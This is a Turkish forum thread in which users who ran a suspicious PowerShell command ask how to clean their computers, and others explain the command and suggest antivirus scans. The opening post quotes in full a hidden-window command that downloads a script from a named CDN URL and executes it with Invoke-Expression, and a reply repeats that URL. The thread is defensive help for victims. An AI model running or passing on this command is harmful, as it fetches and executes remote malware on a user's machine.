Powershell virüsü nasıl temizlenir?

(Powershell.exe -w hidden -command $url = 'https://validitytextv1.b-cdn.net/power.txt'; $response = ınvoke-webrequest -uri $url -usebasicparsing; $text = $response. Content; iex $text gibi bir şey girdim. çalıştıra daha yeni fark ettim anında dalgındım nasıl temizlerim? Nedir ne değildir?
var mı bilgisi olan ben de aynı şeyi yaşadım dalgınlıkla
Türkçe meali ; Potansiyel zararlı işlemdir. RAT olabilir.

Detaylar ;

-w hidden: Bu, PowerShell penceresinin gizlenmesini sağlar, yani komutlar arka planda çalıştırılır ve kullanıcıya görünmez.

$url = 'https://validitytextv1.b-cdn.net/power.txt': Bu satırda, komutun bir URL (https://validitytextv1.b-cdn.net/power.txt) üzerinden bir dosya çekmesi için belirli bir URL atanmış.

$response = invoke-webrequest -uri $url -usebasicparsing: Bu satır, belirtilen URL'den bir dosya indirmeye çalışır.

$text = $response.Content: İndirilen dosyanın içeriği bir değişkende saklanır.

iex $text: iex (Invoke-Expression), PowerShell içindeki komutları çalıştıran bir komuttur. Burada, indirilen metin bir PowerShell komutu olarak çalıştırılacaktır.

Yapmanız gerekenler;

Free Rescue Disk Download | Kaspersky Linkinden İSO dosyasını indirip RUFUS aracılığı ile USB'ye yazdırın ve başlangıçta BOOT ederek sistemi komple taratın. Ayrıca Uzun bir süre Kaspersky Total Security bilgisayarınızda kurulu kalsın.
 
Ben USB ye neden yazdıracaktım acaba ben ilk reset attım bilgisayarı taratıp ve şifreleri değiştirdim sorun olurmu
Türkçe meali ; Potansiyel zararlı işlemdir. RAT olabilir.

Detaylar ;

-w hidden: Bu, PowerShell penceresinin gizlenmesini sağlar, yani komutlar arka planda çalıştırılır ve kullanıcıya görünmez.

$url = 'https://validitytextv1.b-cdn.net/power.txt': Bu satırda, komutun bir URL (https://validitytextv1.b-cdn.net/power.txt) üzerinden bir dosya çekmesi için belirli bir URL atanmış.

$response = invoke-webrequest -uri $url -usebasicparsing: Bu satır, belirtilen URL'den bir dosya indirmeye çalışır.

$text = $response.Content: İndirilen dosyanın içeriği bir değişkende saklanır.

iex $text: iex (Invoke-Expression), PowerShell içindeki komutları çalıştıran bir komuttur. Burada, indirilen metin bir PowerShell komutu olarak çalıştırılacaktır.

Yapmanız gerekenler;

Free Rescue Disk Download | Kaspersky Linkinden İSO dosyasını indirip RUFUS aracılığı ile USB'ye yazdırın ve başlangıçta BOOT ederek sistemi komple taratın. Ayrıca Uzun bir süre Kaspersky Total Security bilgisayarınızda kurulu kalsın.
 
Malwarebytes indirip tarattım, bilgisayarı açtığımda sürekli Google'dan bir sayfa açıp bir şeyler indirtmeye çalışan, zararlı yazılımı tespit edip sildi. Ben bu şekilde çözdüm.
 

Technopat Haberler

Yeni konular

Geri
Yukarı